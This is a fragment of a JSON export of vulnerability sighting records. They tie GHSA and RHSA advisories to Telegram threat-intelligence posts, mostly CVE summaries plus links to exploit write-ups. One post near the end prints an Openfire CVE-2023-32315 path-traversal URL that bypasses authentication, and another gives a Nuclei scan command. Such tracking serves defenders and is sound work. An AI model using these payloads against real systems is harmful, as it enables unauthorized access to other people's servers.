"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7QMG-GRCP-QF25", "type": "seen", "source": "https://t.me/bdufstecru/3274", "content": "", "creation_timestamp": "2026-07-14T01:00:05.468316Z"}, {"uuid": "6a16c744-0930-4306-95e2-514fd4c2ce6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QVRW-V9RV-5RJX", "type": "seen", "source": "https://t.me/ctinow/155620", "content": "https://ift.tt/0cVvBkm\nCVE-2023-49082 | aio-libs aiohttp crlf injection (GHSA-qvrw-v9rv-5rjx)", "creation_timestamp": "2023-12-17T15:11:48.000000Z"}, {"uuid": "a3001468-2424-4b89-b384-d98c321cf8f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q3QX-C6G2-7PW2", "type": "seen", "source": "https://t.me/ctinow/155619", "content": "https://ift.tt/yPwzBen\nCVE-2023-49081 | aio-libs aiohttp ClientSession crlf injection (GHSA-q3qx-c6g2-7pw2)", "creation_timestamp": "2023-12-17T15:11:47.000000Z"}, {"uuid": "1d7a0a69-4430-46f0-9d3b-6128b1851622", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9V3J-4J64-P937", "type": "seen", "source": "https://t.me/ctinow/155563", "content": "https://ift.tt/kBcJ62x\nCVE-2022-41951 | oroinc OroPlatform up to 4.1.13/4.2.10/5.0.8 getTemporaryFileName path traversal (GHSA-9v3j-4j64-p937)", "creation_timestamp": "2023-12-17T10:42:22.000000Z"}, {"uuid": "860e9493-0341-4a42-975e-d0fb07155d79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QMVJ-4QR9-V547", "type": "seen", "source": "https://t.me/ctinow/155575", "content": "https://ift.tt/Zfhig2J\nCVE-2023-48713 | knative serving up to 0.38.x Autoscaler /metrics resource consumption (GHSA-qmvj-4qr9-v547)", "creation_timestamp": "2023-12-17T11:06:34.000000Z"}, {"uuid": "74476647-959b-4124-9c8e-15504ab466b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9WWG-R3C7-4VFG", "type": "seen", "source": "https://t.me/ctinow/155574", "content": "https://ift.tt/AKcTtCk\nCVE-2023-49075 | Pimcore admin-ui-classic-bundle up to 1.2.1 single-factor authentication (GHSA-9wwg-r3c7-4vfg)", "creation_timestamp": "2023-12-17T11:06:33.000000Z"}, {"uuid": "240a2957-f48b-4b6b-ab60-ba1211018cde", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8GWJ-68W6-7V6C", "type": "seen", "source": "https://t.me/ctinow/155572", "content": "https://ift.tt/n2dglYK\nCVE-2023-32064 | oroinc orocommerce up to 4.2.8/5.0.10/5.1.0 ACL access control (GHSA-8gwj-68w6-7v6c)", "creation_timestamp": "2023-12-17T11:06:31.000000Z"}, {"uuid": "b6d8e0c2-c390-48fa-9975-3b498ebc5e2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X2XM-P6VQ-482G", "type": "seen", "source": "https://t.me/ctinow/155573", "content": "https://ift.tt/UnE9oeY\nCVE-2023-32062 | oroinc crm up to 4.2.6/5.0.6/5.1.0 System Calendar Event access control (GHSA-x2xm-p6vq-482g)", "creation_timestamp": "2023-12-17T11:06:32.000000Z"}, {"uuid": "b2f7045b-8ad2-43f6-a3f9-d74acb3d66c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2R5C-GW76-RH3W", "type": "seen", "source": "https://t.me/bdufstecru/3290", "content": "", "creation_timestamp": "2026-07-14T01:00:04.586076Z"}, {"uuid": "ad9a91ff-2b78-4e9a-acf6-e4ade3f5794e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HVC6-42VF-JHF8", "type": "seen", "source": "https://t.me/ctinow/156617", "content": "https://ift.tt/Ew1BaHX\n[GHSA-hvc6-42vf-jhf8] mlflow Command Injection vulnerability", "creation_timestamp": "2023-12-19T22:31:54.000000Z"}, {"uuid": "27269a2f-ea37-4686-9d36-5234d96d746f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RW54-6826-C8J5", "type": "seen", "source": "https://t.me/ctinow/156092", "content": "https://ift.tt/huyJ0x7\n[GHSA-rw54-6826-c8j5] yiisoft/yii2-authclient's Oauth2 PKCE implementation is vulnerable", "creation_timestamp": "2023-12-18T20:48:08.000000Z"}, {"uuid": "c24c1196-92ca-49cb-89b8-f2add9ce3ecc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-45X7-PX36-X8W8", "type": "seen", "source": "https://t.me/ctinow/156091", "content": "https://ift.tt/4XvlLTk\n[GHSA-45x7-px36-x8w8] Russh vulnerable to Prefix Truncation Attack against ChaCha20-Poly1305 and Encrypt-then-MAC", "creation_timestamp": "2023-12-18T20:36:58.000000Z"}, {"uuid": "1bfa0293-6593-46e0-8e40-cc12cce50079", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7879", "type": "seen", "source": "https://t.me/ctinow/155838", "content": "https://ift.tt/cdefmKg\nRHSA-2023:7879: Moderate: opensc security update", "creation_timestamp": "2023-12-18T12:17:33.000000Z"}, {"uuid": "98dc0451-0d35-4190-bb6e-3295249c21ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FM9W-7M7V-WXQV", "type": "seen", "source": "https://t.me/cvedetector/13136", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-52792 - LDAP Account Manager (LAM) Configuration Injection Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-52792 \nPublished : Dec. 17, 2024, 10:15 p.m. | 43\u00a0minutes ago \nDescription : LDAP Account Manager (LAM) is a php webfrontend for managing entries (e.g. users, groups, DHCP settings) stored in an LDAP directory. In affected versions LAM does not properly sanitize configuration values, that are set via `mainmanage.php` and `confmain.php`. This allows setting arbitrary config values and thus effectively bypassing `mitigation` of CVE-2024-23333/GHSA-fm9w-7m7v-wxqv. Configuration values for the main config or server profiles are set via `mainmanage.php` and `confmain.php`.  \nThe values are written to `config.cfg` or `serverprofile.conf` in the format of `settingsName: settingsValue` line-by-line.  \nAn attacker can smuggle arbitrary config values in a config file, by inserting a newline into certain config fields, followed by the value. This vulnerability has been addressed in version 9.0. All users are advised to upgrade. There are no known workarounds for this vulnerability. \nSeverity: 6.5 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"17 Dec 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-12-18T00:18:39.000000Z"}, {"uuid": "09f17b53-006e-4a18-8eb8-5278b849faae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W9XV-QF98-CCQ4", "type": "seen", "source": "https://t.me/cvedetector/7281", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45290 - PhpSpreadsheet File URI Filter Disclosure vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-45290 \nPublished : Oct. 7, 2024, 9:15 p.m. | 36\u00a0minutes ago \nDescription : PHPSpreadsheet is a pure PHP library for reading and writing spreadsheet files. It's possible for an attacker to construct an XLSX file which links media from external URLs. When opening the XLSX file, PhpSpreadsheet retrieves the image size and type by reading the file contents, if the provided path is a URL. By using specially crafted `php://filter` URLs an attacker can leak the contents of any file or URL. Note that this vulnerability is different from GHSA-w9xv-qf98-ccq4, and resides in a different component. An attacker can access any file on the server, or leak information form arbitrary URLs, potentially exposing sensitive information such as AWS IAM credentials. This issue has been addressed in release versions 1.29.2, 2.1.1, and 2.3.0. All users are advised to upgrade. There are no known workarounds for this vulnerability. \nSeverity: 7.7 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"07 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-08T00:19:44.000000Z"}, {"uuid": "5e1e62d2-621f-4309-aafa-e73a9dd0b92c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3RVF-24Q2-24WW", "type": "seen", "source": "https://t.me/cvedetector/3317", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-43378 - Calamares Nixos Extensions LUKS Key Exposure Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-43378 \nPublished : Aug. 16, 2024, 2:15 a.m. | 37\u00a0minutes ago \nDescription : calamares-nixos-extensions provides Calamares branding and modules for NixOS, a distribution of GNU/Linux. Users who installed NixOS through the graphical installer who used manual disk partitioning to create a setup where the system was booted via legacy BIOS rather than UEFI; some disk partitions are encrypted; but the partitions containing either `/` or `/boot` are unencrypted; have their LUKS disk encryption key file in plain text either in `/crypto_keyfile.bin`, or in a CPIO archive attached to their NixOS initrd. `nixos-install` is not affected, nor are UEFI installations, nor was the default automatic partitioning configuration on legacy BIOS systems. The problem has been fixed in calamares-nixos-extensions 0.3.17, which was included in NixOS. The current installer images for the NixOS 24.05 and unstable (24.11) channels are unaffected. The fix reached 24.05 at 2024-08-13 20:06:59 UTC, and unstable at 2024-08-15 09:00:20 UTC. Installer images downloaded before those times may be vulnerable. The best solution for affected users is probably to back up their data and do a complete reinstallation. However, the mitigation procedure in GHSA-3rvf-24q2-24ww should work solely for the case where `/` is encrypted but `/boot` is not. If `/` is unencrypted, then the `/crypto_keyfile.bin` file will need to be deleted in addition to the remediation steps in the previous advisory. This issue is a partial regression of CVE-2023-36476 / GHSA-3rvf-24q2-24ww, which was more severe as it applied to the default configuration on BIOS systems. \nSeverity: 7.8 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"16 Aug 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-08-16T05:21:43.000000Z"}, {"uuid": "0f0ec0cc-abaf-4820-9dd5-a02c17075525", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H4VV-H3JQ-V493", "type": "seen", "source": "https://t.me/cvedetector/5225", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45845 - Nix Directory Traversal Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-45845 \nPublished : Sept. 10, 2024, 11:15 a.m. | 40\u00a0minutes ago \nDescription : nix 2.24 through 2.24.5 allows directory traversal via a symlink in a nar file, because of mishandling of a directory containing a symlink and a directory of the same name, aka GHSA-h4vv-h3jq-v493. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"10 Sep 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-09-10T14:14:20.000000Z"}, {"uuid": "6b68bc45-5dbf-4f18-8e31-17fd18e0fbb5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2021:2300", "type": "published-proof-of-concept", "source": "Telegram/OphBtcFHpzsAaa_PBsn-6jMA-guExzs3Tjx94NVn8zTfkHs", "content": "", "creation_timestamp": "2021-06-10T02:57:54.000000Z"}, {"uuid": "9ddbc327-faaa-4374-b2a4-32dee31381f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C827-HFW6-QWVM", "type": "seen", "source": "https://t.me/cvedetector/4193", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-43806 - Rustix Linux Raw Dir Iterator Memory Explosion Denial of Service\", \n  \"Content\": \"CVE ID : CVE-2024-43806 \nPublished : Aug. 26, 2024, 7:15 p.m. | 39\u00a0minutes ago \nDescription : Rustix is a set of safe Rust bindings to POSIX-ish APIs. When using `rustix::fs::Dir` using the `linux_raw` backend, it's possible for the iterator to \"get stuck\" when an IO error is encountered. Combined with a memory over-allocation issue in `rustix::fs::Dir::read_more`, this can cause quick and unbounded memory explosion (gigabytes in a few seconds if used on a hot path) and eventually lead to an OOM crash of the application. The symptoms were initially discovered in . That post has lots of details of our investigation. Full details can be read on the GHSA-c827-hfw6-qwvm repo advisory. If a program tries to access a directory with its file descriptor after the file has been unlinked (or any other action that leaves the `Dir` iterator in the stuck state), and the implementation does not break after seeing an error, it can cause a memory explosion. As an example, Linux's various virtual file systems (e.g. `/proc`, `/sys`) can contain directories that spontaneously pop in and out of existence. Attempting to iterate over them using `rustix::fs::Dir` directly or indirectly (e.g. with the `procfs` crate) can trigger this fault condition if the implementation decides to continue on errors. An attacker knowledgeable about the implementation details of a vulnerable target can therefore try to trigger this fault condition via any one or a combination of several available APIs. If successful, the application host will quickly run out of memory, after which the application will likely be terminated by an OOM killer, leading to denial of service. This issue has been addressed in release versions 0.35.15, 0.36.16, 0.37.25, and 0.38.19. Users are advised to upgrade. There are no known workarounds for this issue. \nSeverity: 6.5 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"26 Aug 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-08-26T22:10:24.000000Z"}, {"uuid": "e8440bba-8146-4f86-9d57-176b5510a4a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QJQP-XR96-CJ99", "type": "seen", "source": "https://t.me/cvedetector/3209", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-43368 - Trix XSS Pasting Bypass\", \n  \"Content\": \"CVE ID : CVE-2024-43368 \nPublished : Aug. 14, 2024, 10:15 p.m. | 30\u00a0minutes ago \nDescription : The Trix editor, versions prior to 2.1.4, is vulnerable to XSS when pasting malicious code. This vulnerability is a bypass of the fix put in place for GHSA-qjqp-xr96-cj99. In pull request 1149, sanitation was added for Trix attachments with a `text/html` content type. However, Trix only checks the content type on the paste event's `dataTransfer` object. As long as the `dataTransfer` has a content type of `text/html`, Trix parses its contents and creates an `Attachment` with them, even if the attachment itself doesn't have a `text/html` content type. Trix then uses the attachment content to set the attachment element's `innerHTML`. An attacker could trick a user to copy and paste malicious code that would execute arbitrary JavaScript code within the context of the user's session, potentially leading to unauthorized actions being performed or sensitive information being disclosed. This vulnerability was fixed in version 2.1.4. \nSeverity: 6.5 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"15 Aug 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-08-15T00:55:32.000000Z"}, {"uuid": "835d1952-c895-4960-9205-d6ca5a910d83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VJH7-7G9H-FJFH", "type": "published-proof-of-concept", "source": "https://t.me/ton618cyber/7140", "content": "#exploit\n1. SSHNuke Exploit\nhttps://blog.doyensec.com/2025/03/04/exploitable-sshd.html\n\n2. CVE-2024-43639:\nRCE in Microsoft Windows KDC Proxy\nhttps://www.zerodayinitiative.com/blog/2025/3/3/cve-2024-43639\n\n3. Private key extraction in ECDSA upon signing a malformed input\u00a0\nhttps://github.com/indutny/elliptic/security/advisories/GHSA-vjh7-7g9h-fjfh", "creation_timestamp": "2025-03-07T05:49:30.000000Z"}, {"uuid": "5b28301c-b827-4354-90d1-14d11ae3d143", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WM4W-7H2Q-3PF7", "type": "seen", "source": "https://t.me/cvedetector/128", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-39691 - matrix-appservice-irc is a Node.js IRC bridge for\", \n  \"Content\": \"CVE ID : CVE-2024-39691 \nPublished : July 5, 2024, 7:15 p.m. | 46\u00a0minutes ago \nDescription : matrix-appservice-irc is a Node.js IRC bridge for the Matrix messaging protocol. The fix for GHSA-wm4w-7h2q-3pf7 / CVE-2024-32000 included in matrix-appservice-irc 2.0.0 relied on the Matrix homeserver-provided timestamp to determine whether a user has access to the event they're replying to when determining whether or not to include a truncated version of the original event in the IRC message. Since this value is controlled by external entities, a malicious Matrix homeserver joined to a room in which a matrix-appservice-irc bridge instance (before version 2.0.1) is present can fabricate the timestamp with the intent of tricking the bridge into leaking room messages the homeserver should not have access to. matrix-appservice-irc 2.0.1 drops the reliance on `origin_server_ts` when determining whether or not an event should be visible to a user, instead tracking the event timestamps internally. As a workaround, it's possible to limit the amount of information leaked by setting a reply template that doesn't contain the original message. \nSeverity: 4.3 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"05 Jul 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-07-05T22:06:55.000000Z"}, {"uuid": "14f38159-e9e0-41d4-b57e-988e5c67665c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3WQF-4X89-9G79", "type": "seen", "source": "Telegram/KQJ2fokDRUpEEMEdtilLJpNYW94QEwCQWFCqP7BH6XiY", "content": "", "creation_timestamp": "2024-09-12T10:16:41.000000Z"}, {"uuid": "1c851a5e-23e6-4e4b-9b15-5ed5edf3ef9d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V75F-HC9P-6G26", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/71", "content": "https://github.com/advisories/GHSA-v75f-hc9p-6g26\n\nstress-ng --cyclic 30 --timeout 30 --minimize --quiet\nkmemleak frequently reported a memory leak concerning the task_struct:\nunreferenced object 0xffff8881305b8000 (size 16136):\ncomm \"stress-ng\", pid 614, jiffies 4294883961 (age 286.412s)\nobject hex dump (first 32 bytes):\n02 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 .@..............\n00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\ndebug hex dump (first 16 bytes):\n53 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 S...............\nbacktrace:\n[&lt;00000000046b6790&gt;] dup_task_struct+0x30/0x540\n[&lt;00000000c5ca0f0b&gt;] copy_process+0x3d9/0x50e0\n[&lt;00000000ced59777&gt;] kernel_clone+0xb0/0x770\n[&lt;00000000a50befdc&gt;] __do_sys_clone+0xb6/0xf0\n[&lt;000000001dbf2008&gt;] do_syscall_64+0x5d/0xf0\n[&lt;00000000552900ff&gt;] entry_SYSCALL_64_after_hwframe+0x6e/0x76\nThe issue occurs in start_dl_timer(), which increments the task_struct\nreference count and sets a timer. The timer callback, dl_task_timer,\nis supposed to decrement the reference count upon expiration. However,\nif enqueue_task_dl() is called before the timer expires and cancels it,\nthe reference count is not decremented, leading to the leak.\n\n#kernal #leak #vulnerability #linux", "creation_timestamp": "2024-07-30T04:27:38.000000Z"}, {"uuid": "dced0d40-bb2f-433a-bd95-db43e686d070", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HFQC-63C7-RJ9F", "type": "published-proof-of-concept", "source": "https://t.me/Kelvinseccommunity/573", "content": "#exploit\n1. CVE-2024-41003:\nLinux Kernel Vulnerability in the eBPF verifier register limit tracking\nhttps://github.com/google/security-research/security/advisories/GHSA-hfqc-63c7-rj9f\n\n2. CVE-2023-52251,\nCVE-2023-25194,\nCVE-2024-32030:\n3 ways to get RCE in Kafka UI\nhttps://github.blog/security/vulnerability-research/3-ways-to-get-remote-code-execution-in-kafka-ui\n\n3. CVE-2019-8805:\nApple EndpointSecurity Privilege Escalation\nhttps://blog.securelayer7.net/applied-endpointsecurity-framework-previlege-escalation\n]-&gt; PoC: https://github.com/securelayer7/CVE-2019-8805", "creation_timestamp": "2024-07-24T14:14:49.000000Z"}, {"uuid": "9d34454d-4f88-4277-865b-89930d43a99a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7PQ6-V88G-WF3W", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/10529", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22146\n\ud83d\udd39 Description: Sentry is a developer-first error tracking and performance monitoring tool. A critical vulnerability was discovered in the SAML SSO implementation of Sentry. It was reported to us via our private bug bounty program. The vulnerability allows an attacker to take over any user account by using a malicious SAML Identity Provider and another organization on the same Sentry instance. The victim email address must be known in order to exploit this vulnerability. The Sentry SaaS fix was deployed on Jan 14, 2025. For self hosted users; if only a single organization is allowed `(SENTRY_SINGLE_ORGANIZATION = True)`, then no action is needed. Otherwise, users should upgrade to version 25.1.0 or higher. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-15T19:57:59.734Z\n\ud83d\udccf Modified: 2025-01-15T20:44:47.931Z\n\ud83d\udd17 References:\n1. https://github.com/getsentry/sentry/security/advisories/GHSA-7pq6-v88g-wf3w\n2. https://github.com/getsentry/sentry/pull/83407", "creation_timestamp": "2025-01-21T04:23:53.000000Z"}, {"uuid": "35cc202c-ae9b-47db-b1f3-9cfb3bab2869", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-58VJ-CV5W-V4V6", "type": "published-proof-of-concept", "source": "https://t.me/ZeroEthical_Course/1594", "content": "https://github.com/navidrome/navidrome/security/advisories/GHSA-58vj-cv5w-v4v6\n\ncve-2024-47062\n\n#github #poc", "creation_timestamp": "2024-09-25T23:21:09.000000Z"}, {"uuid": "d8724889-bdff-4195-8efb-bdc351c52886", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-58VJ-CV5W-V4V6", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/2078", "content": "https://github.com/navidrome/navidrome/security/advisories/GHSA-58vj-cv5w-v4v6\n\ncve-2024-47062\n\n#github #poc", "creation_timestamp": "2024-09-25T16:36:33.000000Z"}, {"uuid": "94b5139f-a6b7-47ad-8b30-93b9be1657ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R7PG-V2C8-MFG3", "type": "published-proof-of-concept", "source": "https://t.me/leaksmain/291", "content": "#news\n\nhttps://github.com/advisories/GHSA-r7pg-v2c8-mfg3\nA critical vulnerability, CVE-2024-47561, has been identified in the Apache Avro Java SDK, affecting all versions up to and including 1.11.3. This vulnerability allows an attacker to execute arbitrary code on systems parsing Avro data via a specially crafted schema. The root of the issue lies in the deserialization of untrusted data, a common flaw that can lead to remote code execution (RCE). This flaw could be exploited if an application processes malicious Avro schemas, potentially compromising the system entirely.\n\nThe vulnerability was discovered by Kostya Kortchinsky from the Databricks Security Team. Exploits could be launched through frameworks like Kafka or other data pipeline technologies relying on Avro schemas. Although no public proof-of-concept (PoC) has been released yet, this vulnerability poses a serious threat, especially to systems that allow users to upload or provide their own Avro schemas for parsing.\n\nMitigation steps include upgrading to version 1.11.4 or later, which patches the vulnerability, as well as employing schema sanitization and avoiding user-provided schemas wherever possible. It's essential that organizations prioritize patching to avoid security risks", "creation_timestamp": "2024-10-08T01:05:26.000000Z"}, {"uuid": "89d56163-4fb3-4886-a89d-33b09d5c7064", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9V9H-CGJ8-H64P", "type": "seen", "source": "https://t.me/arpsyndicate/3318", "content": "#ExploitObserverAlert\n\nGHSA-9v9h-cgj8-h64p\n\nDESCRIPTION: Exploit Observer has 6 entries in 4 file formats related to GHSA-9v9h-cgj8-h64p. Issue summary: Processing a maliciously formatted PKCS12 file may lead OpenSSL to crash leading to a potential Denial of Service attack", "creation_timestamp": "2024-01-29T09:26:48.000000Z"}, {"uuid": "fe8a968e-d525-4e63-a1f3-e51783056f40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4WGM-H7GM-PG7R", "type": "seen", "source": "https://t.me/arpsyndicate/3282", "content": "#ExploitObserverAlert\n\nGHSA-4wgm-h7gm-pg7r\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-4wgm-h7gm-pg7r. SQL injection vulnerability in Inventory Management v.1.0 allows a local attacker to execute arbitrary code via the name, uname and email parameters in the registration.php component.", "creation_timestamp": "2024-01-28T11:54:02.000000Z"}, {"uuid": "0dd10d7b-1fd8-4e5a-8d01-6cdfe4c2b029", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1887", "type": "seen", "source": "Telegram/J7Uf7XAv_N_bfVwRbbBwmcMHmjw4cd33j3rFMMf79n5alVIo", "content": "", "creation_timestamp": "2024-05-14T03:25:11.000000Z"}, {"uuid": "412800c7-e21a-4477-83d3-afaaa237eb38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R49H-6QXQ-624F", "type": "published-proof-of-concept", "source": "https://t.me/whoisAlixan/2908", "content": "Exploit for W&amp;B Weave Server - Remote Arbitrary File Leak (CVE-2024-7340)\ud83e\udd77\n\nDescription\ud83d\udd08\nThe Weave server API allows remote users to fetch files from a specific directory, but due to a lack of input validation, it is possible to traverse and leak arbitrary files remotely. In various common scenarios, this allows a low-privileged user to assume the role of the server admin.\n\nNuclei Template\ud83c\udf0e\nView the template here CVE-2024-7340.yaml\n\nValidate with Nuclei\necho \"$URL\" | nuclei -t ~/nuclei-templates/http/cves/2024/CVE-2024-7340.yaml\n\nReferences:\nhttps://nvd.nist.gov/vuln/detail/CVE-2024-7340\nhttps://research.jfrog.com/vulnerabilities/wandb-weave-server-remote-arbitrary-file-leak-jfsa-2024-001039248/\nhttps://github.com/wandb/weave/pull/1657\nhttps://github.com/advisories/GHSA-r49h-6qxq-624f", "creation_timestamp": "2024-09-17T20:40:45.000000Z"}, {"uuid": "dfcd787e-8401-40ce-b156-ab2ac42ab317", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GW42-F939-FHVM", "type": "published-proof-of-concept", "source": "https://t.me/arvinclub1/271", "content": "\u0648\u0642\u062a\u06cc \u06af\u0641\u062a\u0647 \u0645\u06cc\u0634\u0647 \u0633\u0631\u0648\u0631\u0647\u0627\u06cc \u062c\u0627\u0628\u0631 \u0647\u0645 \u0645\u0634\u06a9\u0644\u0627\u062a \u062e\u0648\u062f\u0634\u0648\u0646 \u0631\u0648 \u062f\u0627\u0631\u0646 \u0627\u06cc\u0646\u0647\nCVE-2023-32315\nhttp://localhost:9090/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp\nhttps://github.com/advisories/GHSA-gw42-f939-fhvm", "creation_timestamp": "2023-05-29T11:08:45.000000Z"}, {"uuid": 